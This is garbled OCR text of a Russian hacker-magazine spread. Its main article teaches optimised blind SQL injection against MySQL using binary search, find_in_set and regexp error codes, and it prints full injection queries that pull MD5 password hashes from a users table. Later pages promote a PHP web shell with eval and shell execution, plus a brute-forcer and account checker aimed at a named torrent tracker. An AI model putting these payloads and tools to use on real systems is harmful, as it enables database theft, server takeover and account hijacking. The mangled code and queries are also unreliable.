именно он применяется почти во всех адекватных 
скриптах, программах и эксплойтах, работающих 
со слепыми ЗОб-инъекциями. 

Алгоритм работает следующим образом: 



Ответ Му$ОІ_: © 

#1242 - ЗиЬфдесу гешгпз тоге сЬап 1 гою 



ДЛЯ ХАКЕРАОШИБКА- БОЛЬШЕ, 
ЧЕМ ПРОСТО ОШИБКА 



А если рассматривать реализацию на языке 
программирования, то вотпримерфункции, реа- 
лизующей поиск нужного символа этим методом: 

бипсбіоп дебСЬаг ( $иг1 , $:Еіе1с1, 

$роз , $1Ъ=0, $иЬ=2 55 ) { 
ѵтЬіІе (бгие) { 

$М = б1оог($1Ъ + ( $иЬ-$1Ь) /2 ) ; 
іб (сопб ( $иг1 , $:Еіе1с1, '<', $роз, 
$М)==1) { 



Принцип работы прост — для каждого символа 
сравниваем значение его А5СІІ-кода со всеми 
возможными значениями символов. Если вы- 
полняется некоторое условие, то символ найден, 
и его можно выводить на экран. Если условие не 
выполняется — ищем дальше. 

Очевидно, что плюсов у этого метода нет. Совсем. 
За исключением того, что на кал якать код та ко го 
скрипта очень просто. Но разве это то, что нужно 
настоящему хакеру? Оставим этот способ кидди- 
сам и будем двигаться дальше. 

БИНАРНЫЙ 
(ДВОИЧНЫЙ) ПОИСК 

Каждый уважающий себя программистзнаето 
методе под названием бинарный, или двоич- 
ный, поиск. Этот метод используется для поиска 
позиции элемента в отсортированном массиве. И 



1. Берем диапазон всех возможных 
символов (для хеша МБ5 - [0-9, а- 6]) 
и сравниваем значение кода символа в 
БД с кодом символа, который мы пере- 
дали в запросе 

2. Если код символа в БД больше, 
чем код переданного символа, то на 
следующем шаге в качестве диапазона 
возможных символов берем диапазон 
от символа , с которым мы только что 
сравнивали значение в БД, до правой 
границы предыдущего диапазона и идем 
на шаг 1 

3. Если код символа меньше, то берем 
диапазон от текущего символа до ле- 
вой границы диапазона на предыдущем 
шаге и идем на шаг 1 

4 . Если символ не больше и не меньше , 
то мы как раз его и нашли 



$иЪ = $М - 1 ; 

} 

еізе іб (сопб ( $иг1 , $біе1б, '>', 
$роз, $М)==1) { 

$1Ъ = $М + 1; 

} 

еізе 

гебигп сЬ.г($М) ; 

іб ($1Ь > $иЪ) 
гебигп -1; 

} 

} 

Рассмотрим этотспособ на примере получения из 
базы М05-хеша юзера. При этом учтем следую- 
щиеусловия: 

1 .Диапазон возможных символов: 0,1 ,2, 3,4,5, 6, 7, 
8, 9, а, Ь, с, б, е, і 
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Ре*игтп • ѵ*ие ш о* гапде ом в а » те ятшд а и в « те Лтд і 
«МіО ям И а «под сотроѵм ос ыміппеі «ерягмев оу* .* спясяс» 
япввіе «кем і» • семпл огіуреігт. те иа»_м_ «сто типевол 

Я ггг Ч пос Ю чі 1 ;«Г ОТ * «г,.:»» и Вт* *іщ*у іотпд яяйятпа 

оом пся «оь ргаресѵ * <пе пгм ягдияет* согсага • сотпа Г .* 



: (Шшс с о т яапд ос я шяіппр а 
я мм Пс* агдиспеле я я солям «міо 
домхм ю и» в* асѵмпек РМисгая 
« «тяг ждоас* я «ш.1 Тги Сипстюп 



,і> шюепс: 



яопяишпясштмг кояюсячсм я.яяя.мя яя . таили ю а мояа рсяст». япо ц»ист т* г«іиі и я 
«ПС10 ЯЯЯО.РЯ ГМ*Д пя« по окном ро»ч о» тсюпаі рял 



-> 'И.эм.іт* 



^кШіЖ шп 



Р ФУНКЦИЯ РІМ0_Ш_5ЕТС0БСТВЕНН0И ПЕРСОНОЙ 

Ня 



с>ГЬіі 



НТТР://ѴѴѴШ 



> Ііпкз 



» ЬбрзУЛогит. 



апбсбакги/ 
1Ьгеас143966.Ыпп[ - 



все о 50І_ Ігуесбоп. 
• беѵ.тѵздксот/ 
зоигсез/сіохудеп/ 



туздІ-5.1/ 
гедеггог 8с-зоигсе. 



Мті— исходники 
Му50І_, отвечающие 
за отображение оши- 
бок гедехр. 

• беѵ.тузді.сот/бос 



— документация по 
Му50І_ (рекомендую]. 

• ги.ѵѵікіребіа.огд/ 



ууікі/Двоичный по- 
иск — базовые алго- 
римы надо знать! 



2. В БД находится символ: Ъ'. 
Запускаем алгоритм: 



1 ) Находим середину диапазона [ОД, 2, 3,4, 5, 6,7, 
8,9,а,Ь,с,сі,еД] ; серединой является символ '8' 

2 ) Сравниваем, - код символа ' Ь ' больше или 
меньше, чем код символа 1 8 ' ? (шлем запрос) 

3 ) Код больше , поэтому на следующую итерацию 
уже берем диапазон [8,9,а,Ь,с,б,еД]; середи- 
ной является символ ' с ' 

4 ) Сравниваем, - код символа ' Ь ' больше или 
меньше, чем код символа 'с'? (шлем запрос) 

5 ) Код меньше , поэтому на следующую итерацию 
берем диапазон [ 8 , 9 , а , Ь , с ] ; серединой являет- 
ся символ ' а ' 

6) Сравниваем, - код символа 1 Ь ' больше, чем 
код символа 'а'? (шлем запрос) 

7 ) Код больше , поэтому на следующую итерацию 
берем диапазон [а,Ъ,с]; серединой является 
символ 1 Ь 1 

8 ) Сравниваем, - код символа 1 Ь ' больше или 
меньше, чем код символа ' Ь ' ? (шлем запрос) 

9) Код ни больше и не меньше, значит, символ в 
БД = ' Ь ' 



іф иіЛіім! |Ш.-| В1 Т*І , 



ОШИБКИ КЕ6ЕХР В ИСХОДНЫХ КОДАХ 
МѴ50І. 




, 5, 6, 7, 8, 9, а, Ъ, с, б, е, б' ) ; 



В результате мы получаем номер символа во множестве '0,1 ,2 
,3,4,5,6,7,8,9,а,Ь,с,б,е,Г. К примеру, для символа 'Ь' р этот запрос 
вернет 12. 

А теперь подумаем, что же можно из это го выжать? Для того 
чтобы принять результаты запроса, мы должны как-то научиться 
принимать числа, являющиеся результатом. Но непосредствен- 
но при слепой 50 1_- инъекции мы этого сделать не можем. Ачто, 
если мы имеем дело с инъекцией, к примеру, в скрипте отобра- 
жения новостей, и в зависимости отіб, переданного скрипту, 
будем видеть разные странички? Тогда боевой запрос, нужный 
для получения символов из МБ5, будет выглядеть воттак: 



пемз . р!ір?іб=біпб_іп_зеб ( зиЪзСгіпд ( ( зеіесб 
раззЬазЬ бгогп изегз ІішіД 0,1) ,1,1) , '0, 1,2,3, 
4,5,6,7,8,9,а,Ь,с,б,е,1' ) 



Тогда, в зависимости от номера символа в строке '0,1 ,2, 3,4, 5, 6, 7 
,8,9,а,Ь,сДе,Г, мы будем видеть новость с іб, соответствующим 
символупароля. 

Для удобства использования на практике нужно: 



1) Выделить ключевые слова на страницах с нуж- 
ными іб 

2 ) Отправить запросы с 1іпб_іп_зеб для каждого 
символа из БД 

3) Выяснить, страницу с каким іб мы получили и 



к 



X 



I 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно 
с целью ознаком- 
ления! Ни автор, ни 
редакция за твои 
действия ответствен- 
ности не несут! 



Таким образом, взависимости от конкретной реализации 
алгоритма, мы отправляем до 5-6 запросов на определение 
символа. И это в худшем случае, так как сим вол может найтись 
и раньше. Итого получаем примерно 1 60-170 запросов на 
получение М05-хеша. Уже лучше, но зачем останавливаться на 
достигнутом, если можно действовать еще быстрее? 

ИСПОЛЬЗОВАНИЕ РШБ Ш_5ЕТ|) 

И ПОДОБНЫХ ФУНКЦИЙ 

Функция б пб_іп_5е1;(5І:г,5І:гІІ5І:] используется для поиска под- 
строки среди списка строк, разделенных символом и возвра- 
щает номертой строки из списка, которая равна переданному 
аргументу. То есть: 

шузд1> ЗЕБЕСТ ЕШБ_Ш_5ЕТ ( ' Ь ' , ' а , Ь , с , б ' ) ; 

-> 2 

Кодсимвола из базы данных можноузнать при помощи запроса: 

зеіесб Тіпб_іп_зеб ( (зиЬзбгіпд( (зеіесб 
раззмогб Тгош изегз іітіб 1) ,1,1)) , '0,1, 2, 3,4 



вывести на экран код символа 

То есть, для получения М 05-хеша нам потребуется выявить 16 
страницеуникальными іб, по одной страницедля каждого сим- 
вола алфавита, а также отправить 32 запроса для определения 
значения каждого символа. В итоге, при использовании этого 
метода нам потребуется отправить всего 48запросов на сервер, 
16 из которых никакого подозрения читающего логи админа 
вызвать не могут. Изначально этот метод предложили +1оха+ и 
табпеТ Они же заметили, что помимо функции біпб_іп_зе1: для 
реализации подобной атаки можно использовать функции 
Ю САТЕ(],І ЫЗТРО.АЗСІ 1(],0Р0(). Причем, АЗСІІО и ОРБО даже 
предпочтительнее за счеттого, что они присутствуют не 
только в Му50І_. Способ работает быстро, но обладает рядом 
недостатков. К примеру, на сайте идентификаторы новостей 
могутбыть распределены неравномерно, то естьскрипт 
приходится затачивать под каждый сайт индивидуально. Еще 
одной проблемой являетсято, что для большого количества 
символов в алфавите нужно большое количествоуникальных 
страниц, которые не всегда присутствуют. В общем, мотаем на 
ус и двигаемся дальше. 



► 066 
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ИСПОЛЬЗОВАНИЕ РІМ0_ІМ_ЗЕТ() + 
МОРЕіКОѴѴ 

Если хорошенько поиграться с методом, предложенным выше, 
можно заметить, что все его минусы сводятся ктому, что далеко 
йена всех сайтах возможно получить достаточное количество 
различныхстраниц.зависящихот одного параметра. Решим эту 
проблему. Вспомним метод, предложенный ЕІекЕом в ][ #1 11, 
который основан на использовании ошибки «БиЬциегу геіигпз 
тогеіЬап 1 гоѵѵ». Суть метода за ключа ется в том, чтобы заста- 
вить скрипт выводить ошибку 5СИ в зависимости от результата 
ЗОБ-запроса. Наданный момент, чтобы спровоцировать БД на 
выводошибки, наиболее часто используется запрос: 

ЗЕЬЕСТ 1 ІШІСЖ ЗЕЬЕСТ 2 

-который вернетошибку: 

#1242 — ЗиЬдиегу геЬигпз тоге ЬЬап 1 гом 

Также 2аСо нашел альтернативный вариант запроса, который 
провоцирует БД на выводошибки взависимости отусловия: 

"х" гедехр сопсаЬ ( "х{ 1 , 25 " , іі ( @@ѵегзіоп<>5 , 
"5}", "6}") 



Втом случае, если версия МуБцІ не равна 5, этотзапрос вернет 
ошибку: 

#1139 — Со# еггог 'іпѵаіісі гереЬіЬіоп 
соипЬ(з) 1 ігот гедехр. 

Немного порывшись в исходниках МуБцІ и погуглив, можно 
найти еще 9 ошибок, которые возвращает неправильный 
гедехр. Итого, от сервера мы можем получить 1 1 видов ошибок+ 
1 состояние, когда ошибки нет: 

ЗЕЬЕСТ 1 
N 0 еггог 

зеІесЬ іі(1=1, (зеІесЬ 1 ипіоп зеІесЬ 2) ,2) 

#1242 — ЗиЬдиегу геЬигпз тоге ЬЬап 1 гом 
зеІесЬ 1 гедехр ІЬ ( 1=1 , "х{ 1 , 0 } " , 2 ) 

#1139 — СоЬ еггог 'іпѵаіісі гереЬіЬіоп 

соипЬ (з) ' Ьгот гедехр 

зеІесЬ 1 гедехр ІЬ ( 1=1 , "х{ 1 , ( " , 2 ) 

#1139 — СоЬ еггог 'Ьгасез поЬ Ьаіапсесі' Ьгот 
гедехр 

зеІесЬ 1 гедехр ІЬ ( 1=1 ,'[[:]]', 2 ) 

#1139 — СоЬ еггог 'іпѵаіісі сЬагасЬег сіазз ' 

Ьгот гедехр 

зеІесЬ 1 гедехр ІЬ ( 1 = 1 , ' [ [ ' , 2 ) 

#1139 — СоЬ еггог 'ЬгаскеЬз ( [ ] ) поЬ Ьаіапсесі' 
Ьгот гедехр 

зеІесЬ 1 гедехр ІЬ (1=1, ' ( ( {1} ' ,2) 

#1139 — СоЬ еггог ' гереЬіЬіоп-орегаЬог орегапЬ 

іпѵаіісі' Ьгот гедехр 

зеІесЬ 1 гедехр ІЬ ( 1 = 1 , ' ' , 2 ) 

#1139 — СоЬ еггог ' етрЬу ( зиЬ) ехргеззіоп ' Ьгот 
гедехр 




ПРИМЕРЭКСПЛОИТА, НАПИСАННОГОЯВНО НОВИЧКОМ 



зеІесЬ 1 гедехр ІЬ ( 1 = 1 , ' ( ' , 2 ) 

#1139 — СоЬ еггог ’рагепЬЬезез поЬ Ьаіапсесі' 
Ьгот гедехр 

зеІесЬ 1 гедехр ІЬ ( 1 = 1 , ' [2-1] ' ,2) 

#1139 — СоЬ еггог 'іпѵаіісі сЬагасЬег гапде ' 

Ьгот гедехр 

зеІесЬ 1 гедехр ІЬ (1 = 1 , ' [ [ . сЬ . ] ] ' , 2 ) 

#1139 — СоЬ еггог 'іпѵаіісі соІІаЬіпд еІетепЬ ' 
Ьгот гедехр 

зеІесЬ 1 гедехр ІЬ ( 1 = 1 , ' \\ ' ,2) 

#1139 — СоЬ еггог 'Ьгаіііпд ЬаскзІазЬ (\) ' Ьгот 
гедехр 

Пока просто примем это во внимание. Теперь самое время 
вспомнить о функции 1іпб_іп_5еТ Если искомый символ есть во 
множестве подстрок, она вернет номер подстроки, если нет — 
вернетО. Попробуем привязать результат работы этой функции 
кразличным кодам ошибоки передадим воттакой запрос: 

зеІесЬ * Ьгот изегз ѵЛіеге ІЬ=-1 
АЖ) "х" гедехр 
сопсаЬ ( "х{ 1 , 25 " , 

Ьіпс1_іп_зеЬ ( 

зиЬзЬгіпд( (зеІесЬ раззѵскі Ьгот изегз ѵЬЬеге 
ІЬ=1) ,1,1) , 

'а, Ь, с, Ь,е, 1,1,2, 3,4, 5, б' 

)> 0 , 

(зеІесЬ 1 ипіоп зеІесЬ 2) , 

" 6 }" 

) 

) 

В результате, если первый символ пароля находится во мно- 
жестве 'а.Ь.сДефІ ,2,3,4,5,6', то запрос вернет: 

#12 42 — ЗиЬдиегу геЬигпз тоге ЬЬап 1 гом 

А если не находится, то: 

#1139 — СоЬ еггог 'іпѵаіісі гереЬіЬіоп 



| ІЫРО I I 

> іпіо 

Большим 
преимуществом 
последнего из пере- 
численных методов 
является то, что он 
стем же успехом 
может работать 
и в ІЫ5ЕВТ, 
и в БРОАТЕ запросах. 

> СІѴСІ 

На дискеты сможешь 
найти скрипты для 
работы сЗОЕ-инъек- 
циями с использова- 
нием описанных 
в статье методов. 
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ЭКСПЛОЙТЫ ДЛЯ ВЫЫ050І- 
ІШЕСТІОЫ ПИШУТСЯ почти 
ЕЖЕДНЕВНО 



соипіАв) 1 ігот гедехр 

При каждом запросе по коду ошибки мы можем 
узнать, ккакой группе принадлежитсимвол! На- 
пишем скрипт, использующий данный метод. Для 
составления оптимального запроса нужно сгруп- 
пировать символы алфавита так, чтобы количес- 
тво обращений ксерверубыло минимальным. 
Рассмотрим задачу на примере МР5. Мы знаем, 
чтоунасмогутприсутствоватьтолько символы из 
диапазона [0-9, а-б. Также мы знаем, что количест- 
во групп символов равно двенадцати, ведь всего 
наш запрос может вернуть одиннадцать видов 
ошибок и одно состояние, когда ошибки нет. 

Для случая с МБ5 оптимальной расстановкой 
символов по состояниям, кпримеру, будет: 



[01] 


'0 


[02] 


' 1 


[03] 


'2 


[04] 


•з 


[05] 


1 4 


[06] 


' 5 


[07] 


' 6 


[08] 


* 7 


[09] 


' 8 


[Ю] 


'9 


[11] 


' а 



При каждом запросе ксерверу мы узнаем номер 
группы, в которой находится символ, храня- 
щийся в БД. В итоге, если символ находится 
в группах02-1 1 , — мы узнаем значение этого 
символа с помощью всего одного запроса. Если 
нам не повезло и символ находится в группе 01 , 
то перед отправкой следующего запроса рас- 
сортируем символы из этой группы по состояни- 
ям и сразуже узнаем значение интересующего 
нассимвола: 

[01] : 'О' 

[02] : ’ Ь ' 

[03] : ' с ' 

[04] : 'Ь' 

[05] : ■ е ' 

[ 06 ] : 'р 

Итоговый алгоритм работы по этому методу выгля- 
дит несложно: 

1 . Оптимально распределить символы 



алфавита по группам 
2 . Установить соответствия между 
номером группы и возвращаемым кодом 
ошибки 

3 . По возвращенному коду ошибки 
выяснить, в какой группе находится 
символ из БД 

4 . Если в этой группе только один 
символ, то выводим его на экран; если 
больше, чем один символ, то распре- 
делим символы из группы по состояни- 
ям и возвращаемся к шагу 2 

В соответствии с алгоритмом составляем запрос. 
И замечаем, что ошибки, которые мы собираемся 
использовать, обладают парой особенностей. 
Первая заключается втом, что запрос 

"х" гедехр сопсаС ( "х{ 1 , 25 " , іі(@@ 
ѵегзіоп<>5, "5}", "6}") 

вернет нужную нам ошибку, только если мы его 
будем передавать на сервер именно втаком виде. 
То есть, все вложенныеусловия нужно добавлять 
внутрь этого \\, а также в начале всех остальных 
выражений гедехр нужно добавлять символ «}». 
Иначе, независимо от содержания остальных 
подзапросов, мы будем получатьлишьошибку: 

«#1 1 39 — Ооі еггог ’гереббоп-орегаіюг орегапб 
іпѵаІісПтот гедехр». 

Вторая особенность заключается втом, что запрос 

зеіесб 1 гедехр іі ( 1 = 1 , ' ' , 2 ) , 

возвращающий ошибку«0о!:еггог , етр1:у (зиЬ) 
ехргеззіоп'ігот гедехр», работает, какхочется 
нам, только при наличии пустого подзапроса в 
гедехр или так: 'а Г, когда после символа Т отсутст- 
вует что бы то ни было. Поэтому, сучетом первой 
особенности, будем использовать именно этот 
вид подзапроса. 

Теперь попробуем собрать всю известную нам ин- 
формацию вместе, и для выуживания МОб-хеша 
получаем итоговый запрос: 

зді . рЬр ? і <5= 1 + АЫБ+ "х" + 
гедехр+сопсаб ( "х{ 1,25" , + ( іб ( біпб 
_іп_зеб ( зиЬзбгіпд ( ( зеіесб+разз+бго 
т+изегз+1ітіб+0 , 1 ) ,1,1) , '0,с,б,е,б 
, 1,2, 3,4, 5, 6, 7, 8, 9, а' ) , 

(іб ( біпб_іп_зеб (зиЬзбгіпд ( (зе1есб+ 
разз+бгот+изегз+1ітіб+0 , 1) ,1,1) , '0 
, с, б, е, б, 1,2, 3,4, 5, 6, 7, 8, 9') , 

(іб (біпб_іп_зеб (зиЬзбгіпд ( (зе1есб+ 
разз+бгот+изегз+1ітіб+0 , 1 ) ,1,1) , '0 
, с, б, е, б, 1,2, 3,4, 5, 6, 7, 8' ) , 

(іб (біпб_іп_зеб (зиЬзбгіпд ( (зе1есб+ 
разз+бгот+изегз+1ітіб+0 , 1) ,1,1) , '0 
, с, б, е, б, 1,2, 3,4, 5, 6, 7 1 ) , 

(іб (біпб_іп_зеб (зиЬзбгіпд ( (зе1есб+ 
разз+бгот+изегз+1ітіб+0 , 1 ) ,1,1) , '0 
, с, б, е, б, 1,2, 3,4, 5, 6' ) , 

(іб (біпб_іп_зеб (зиЬзбгіпд ( (зе1есб+ 
разз+бгот+изегз+1ітіб+0 , 1) ,1,1) , '0 
, с, б, е, б, 1,2, 3,4, 5' ) , 



( іб ( біпб_іп_зеб ( зиЬзбгіпд ( ( зе1есб+ 
разз+бгот+изегз+1ітіб+0 , 1 ) ,1,1) , '0 
, с, б, е, б, 1,2, 3,4' ) , 

( іб ( біпб_іп_зеб ( зиЬзбгіпд ( ( зе1есб+ 
разз+бгот+изегз+1ітіб+0 , 1 ) ,1,1) , '0 
, с, б, е, б, 1,2,3 ' ) , 

( іб ( біпб_іп_зеб ( зиЬзбгіпд ( ( зе1есб+ 
разз+бгот+изегз+1ітіб+0 , 1 ) ,1,1) , '0 
,с,б,е, б, 1,2 • ) , 

( іб ( біпб_іп_зеб ( зиЬзбгіпд ( ( зе1есб+ 
разз+бгот+изегз+1ітіб+0 , 1 ) ,1,1) , '0 
,с,б,е,б,1') , 

( іб ( біпб_іп_зеб ( зиЬзбгіпд ( ( зе1есб+ 
разз+бгот+изегз+1ітіб+0 , 1 ) ,1,1) , '0 
, с , б, е , б ' ) , 

('}'), 

( зе1есб+1+ипіоп+зе1есб+2 ) ) ) , 

‘ }х{ 1 , 0 } 1 ) ) , 

1 }х| | ( ' ) ) , 

'}[[:]] ')), 

'}[[')), 

' ) ( ((И ' ) ) , 

*>(')), 

'}(')), 

' ) [2-1] 1 ) ) , 

' ) [ [.сЬ. ]]')), 

* >\\ ' ) )) 

+ -- + 1 

В результате, этот запрос не вернетошибки, если 
символ из базы данных является одним изсимво- 
лов '0, с, б, е, Г, а вернетошибку«5иЬдиегуге!:игп5 
тогебэап 1 гоѵѵ», если в базе данных лежит цифра 
1 .Также запрос вернетошибку ’іпѵаіісі гереббоп 
соип^з]', если в базележитсимвол '2'. Итакдалее. 
Итак, мы добилисьтого, чего хотели — запрос 
при помощи 1 1 различных видов ошибок 
сообщает нам, какой именно символ лежит в 
базе данных. Мы получаем быстродействие, 
превышающее скорость работы всех осталь- 
ных методов работы с ВбпсІ 506 Іщесбоп. Для 
выуживания МОб-хеша нам потребуется около 
42 запросов, а это уже на порядок быстрее, 
чем в тех методах, которые используют сейчас. 
Мало того, если найти еще 4 запроса, при 
которых ошибка будет возникать во время 
вы пол нения, то на получение всего хеша нам 
потребуется уже 32 запроса. А это значит- 1 
запрос на 1 символ. Раньше о подобном можно 
было только мечтать. 

Понятно, что подобные 506-обращения крайне 
тяжело составлять вручную, поэтому на диске 
ты найдешь скрипт, который умеет составлять 
запросы для алфавитов любой длины и при любом 
количестве известных ошибок 

ОІЛКО 

На самом деле, существуютеще возможности уско- 
рить процесс работы со слепыми 506-инъекциями. 
Осталосьтолько их найти. Главное, не зацикливать- 
ся на «дедовских» методах. Относиться ко всему, что 
придумали хакеры предыдущих поколений, надо, 
каккдеталям мозаики, сложив которые воедино, 
можно выйти на совершенно новыйуровень 
развития технологий взлома.ц-с 



► 068 



ХАКЕР 07 /127/ 09 




ПОДПИШИСЬ Г""™-’™ 



Выгода ■ Гарантия ■ Сервис 



ш/ѵѵ.діс.ги 



автомобилей 



сагтиж 



СРОРСПШ 



йиохРЕРТ 




6 мес. 594, 00 руб. 
12 мес. 1056,00 руб. 



СТРАНА 

ИГР 






ІІщШгд 





6 мес. 653, 40 руб. 

1 2 мес. 1 1 88, 00 руб. 



6 мес. 41 5, 80 руб. 
1 2 мес. 778, 80 руб. 






б мес. 1080, 00 руб. 
1 2 мес. 1 960, 00 руб. 



ОідіІаІРИоЮ мастерская 



б мес. 653, 40 руб. 

1 2 мес. 1 1 88, 00 руб. 



РУР 




б мес. 1300, 00 руб. 
12 мес. 2300,00 руб. 



б мес. 950, 40 руб. 
12 мес. 1716,00 руб. 



6 мес. 653, 40 руб. 6 мес. 670, 00 руб. 

12 мес. 1188,00 руб. 12 мес. 1230,00 руб. 



б мес. 1200, 00 руб. 
1 2 мес. 2200, 00 руб. 



лпс 




6 мес. 1200, 00 руб. 
12 мес. 2100,00 руб. 



6 мес. 990, 00 руб. б мес. 1 200, 00 руб. 

12 мес. 1790,00 руб. 12 мес. 2100,00 руб. 



ХУЛИГАН 






Вышиною 

“крестиком 




3 мес. 570, 00 руб. 

6 мес. 1080,00 руб. 



6 мес. 432, 30 руб. 
1 3 мес. 858, 00 руб. 



МаМаІІ 



ОПВОДКО 




6 мес. 670, 00 руб. 

1 2 мес. 1 220, 00 руб. 




4 мес. 466, 00 руб. 
8 мес. 848, 00 руб. 



зкразз 



Моипіаіп 




4 мес. 466, 00 руб. 
8 мес. 848, 00 руб. 




6 мес. 534, 60 руб. 
1 2 мес. 990, 00 руб. 



СВОЙЖИЕС 





6 мес. 890, 00 руб. 
12 мес. 1630,00 руб. 



КОМПЛЕКТЫ: 




Ште) 1 апб 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 





















Программы для хакеров 



В*міх/уін 
иаид рмітру ВОРОРІЫ 





В повседневных буднях мы зачастую используем 
веб-шеллы. Оно и понятно — более простого 
средства управления своим (и нетолько] сервером 
еще не придумали. В этот раз я предлагаютебе 
рассмотреть — рІтрВетоІеѴіеѵѵ. Скрипт пред- 
ставляет собой аналогвеб-шелла, оснащенный 
ехріогег-интерфейсом и прекрасно работающий 
под виндовыми и никсовыми серверами: 

1 . Просмотр содержимого файлов в виде : 

• НТМЬ-файлов (полноэкранный режим) 

• Ріаіп-текста (полноэкранный режим) 

• Файлов РНР-сессий 

• Картинок тред/трд/ді^/рпд 

2 . Действия в режиме просмотра ката- 
логов : 

• Загрузка файла (кнопка в виде стрел- 
ки вниз) 

• Просмотр панели информации и управ- 
ления (кнопка в виде стрелки вправо) 

• Просмотр файла (клик по самому файлу) 

3. Доступные операции в файловой сис- 



теме : 




• Просмотр дерева каталогов 

• Удаление каталога, всех его подката- 
логов и файлов 

• Удаление файлов из каталога (но не 
подкаталогов и не самого каталога) 

• Создание каталога 

• Создание нового файла в каталоге 

• Аплоад файлов 

• Просмотр времени создания и модифи- 
кации файлов /каталогов 

• Предпросмотр бинарных файлов 

• Кодирование /декодирование файла 
Вазе64 

• Редактирование файлов 

• Удаление файлов 

• Обнуление файлов (сброс размера в О 
байт) 

• Обновление файлов (установка теку- 
щей даты изменения) 

• Уничтожение и удаление файлов (за- 



щита от восстановления удаленных 
файлов ) 

• Копирование файлов 
4 . Иные возможности : 

• Переключение языка: русский/анг- 
лийский 

• Просмотр ркріпіо ( ) 

• Выполнение любого РНР-кода через 




Парсим акки сторрент-трекера 



функцию еѵаі ( ) 

• Выполнение команд в командной стро- 
ке (зйеіі) 

• Кодирование текста в МББ-хэш или по 
алгоритму Вазе64 

• Брут МББ-хэшей (для пассов длиной до 
6-7 символов) 

• Операции с датой /временем и ипіх 
бітезбатр, использование ткбіте ( ) 

• Конвертация русского текста в 
транслит и обратно 

• Конвертация между кодировками 
ср1251, коі8-г, екс 

В сорце скрипта следует отредактировать не- 
сколько параметров: 

• $тлпгібе_ассезз — можно ли тулзе 
создавать/удалять/модифицировать 
файлы. Раізе — только чтение, Тгие — 
полный доступ 

• $рЬреѵа1_ассезз — можно ли испол- 
нять рЬр-код через функцию еѵаі ( ) . 
Тгие — можно, Раізе — нельзя 

• $зузбеш_ассезз — можно ли выполнять 
команды на сервере (зкеіі) . Раізе — 
нельзя , Тгие — можно 

Кроме того, для доступа к скрипту можно устано- 
вить параметры авторизации: 

• $1одіп — логин (Іаізе, если автори- 



стороной мимоторрент-трекеров, следующий 
набор утил для тебя :). Говоря точнее, набор тулз 
предназначен для крупноготоррент-трекера Иііе. 
ги (администрации ресурса передаем привет; как 
говорится, ничеголичного] и включает в себя: 
брутер, чекер и парсер аккаунтов с вышеупомя- 
нутого проекта. Сейчас мы подробно рассмотрим 
все три скрипта. Итак: 

1 . ТРіІе.РЦІ Рагзег — РНР-скриптдля парсинга 
ников с форума ресурса. Перед запуском тебе 
необходимо задать несколько параметров: 

• начальный и конечный Ю юзеров на форуме; 

• название файла статистики; 

• название файла для сохранения ников. 

2. ТРіІе. РРІ ВпЛег — РНР-скриптдля брута пассов 
каккам наРіІе.ги. Использует ранее собранные 
ники с форума, совмещенные с пассворд-лис- 
томдоестьсписокдля брута должен быть в 
таком виде: логин:пароль. В Ьаб-файл пишутся 
нерабочие аккаунты, в доосРфайл — аккаунты с 
правильными паролями. 

3. ТРіІе.РІІ СЬескег— РНР-скрипт, который чека- 
етаккаунты из дооб-файла на рейтинг, количест- 
во слитых/залитых метров и пишетлог в виде: 
изегпате: иріоасі : X сіоѵѵпіоасі : X гаііпд : X — либо 
без имени юзера: иріоасі : X сіоѵѵпіоасі : X гаііпд : X. 
Благодарим таШэгизЬ'а за удобный и функцио- 
нальный комплектскриптов :). 

Р.З. Кстати, не забывай, что получение доступа 
к чужим аккаунтам категорически запрещено и 
карается по всей строгости закона! 



зация отключена) 



• $разз — пароль 

• $Нюзб_а11сж — с каких хостов можно 
коннектиться к скрипту (по дефолту 



ЯЯУІЫР0У5 200О/ХР/2003 
ааид кмокеуіиЕ 



«*» — доступ с любых хостов) 

Утила, каквидишь, вполне актуальна посей день, 
поэтому можешь смело сливать ее с нашего ДВД 
и аплоадить на доступныетебе сервера. 



ПРОГРАММА: 



Е ТРИ-Е.РІІ ВРІІТЕР/ 

СНЕСКЕР/РАРЗЕР 

нд*міх/уім 

ИіЦі]Д мАіі_вризн 

Еслиты сторонниксвободного распространения 
всевозможного файло в Сети и не можешь пройти 



Частенько требуется оперативно поднять собст- 
венный веб-сервер в комплекте с РНР, муску- 
лом и прочимжизненно необходимым софтом. 
Подобных комплектов сейчас хватает. Некоторые 
из них я выкладывал в прошлых выпускахХ-Тулз, 
дабыты смогоценитьвсе преимущества и недо- 
статки каждого продукта, начиная от Оепѵѵег'а 
и заканчивая ТорЗегѵег'ом. Сегодня я хочу 
представить тебе принципиально иную софтину 
из серии «все в одном» — «Раз! ѴѴеЬ Зегѵег» от 
человека, скрывающегося под ником Кпокзѵѵіііе. 
Основное отличиеутилыотаналоговзаключается 



X 





взлом 



г 



в наличии пдіпх, тосІ_5есигіІу и ряда полезных 
фишек. При сборке комплекта был сделан упор на 
стабильность и безопасность, чего так не хватало 
большинству аналогичных продуктов. Среди 
составляющих софтины следует выделить: 

• Софт : пдіпх 0.6.35, АрасЬе 2.2.4, 

РНР 5.2.4, 2епс1 Епдіпе 2.2.0, МуЗОЬ 

5.0. 45, рЬрМуАбтіп 2.6.1, Зепсітаіі 

• Принцип работы: Ыдіпх бгопбепЬ + 
АрасЬе ЬаскепЬ 

• Фильтрация СЕТ/ РОЗТ- запросов 

• Наличие шосЦзесигібу (с предуста- 
новленными основными правилами) 

• Наличие расширенной защиты от ХЗЗ/ 
ЗОЬ- инъекций 

• Полное логирование событий 

• Удобная панель управления 

• Возможность изменения сигнату- 
ры сервера (по дефолту определяется 
как пдіпх/ 0.6.35, Неб Наб Епбегрг і зе 
Ьіпих 5.3) 

• Наличие лицензии СМІ/СРЬ на все 
компоненты 

• В пакет входит Ѵізиаі С++ 2 008 
КеЫзб (необходим для шосЦзесигібу ) 

• Наличие скрипта ЗОЫпіо (необходим 
для отображения настроек МуЗОЬ) 

Настроить софтину довольно просто. Для этого: 

1. Открываем С:\пдіпх\сопЛпдіпх.сопі Правим: 

Іізбеп 192.168.94.105:80; #наш ІР 
зегѵег_паше аЬзЬзз 192.168.94.105; 
#имн нашего сервера 

2. Открываем С:\пдіпх\5егѵег\и5г\ІосаІ\арасЬе\ 
сопЛШрб.сопі Правим: 

КРАЕргоху_ірз 192 . 168 . 94 . 105 

127.0. 0.1 #где, 192.168.94.105 - наш ІР 

3. Заливаем файлы в корень веб-каталога нашего 
сервера: 

С: \пдіпх\зегѵег\Ноте\сизбот\тлЛлм 

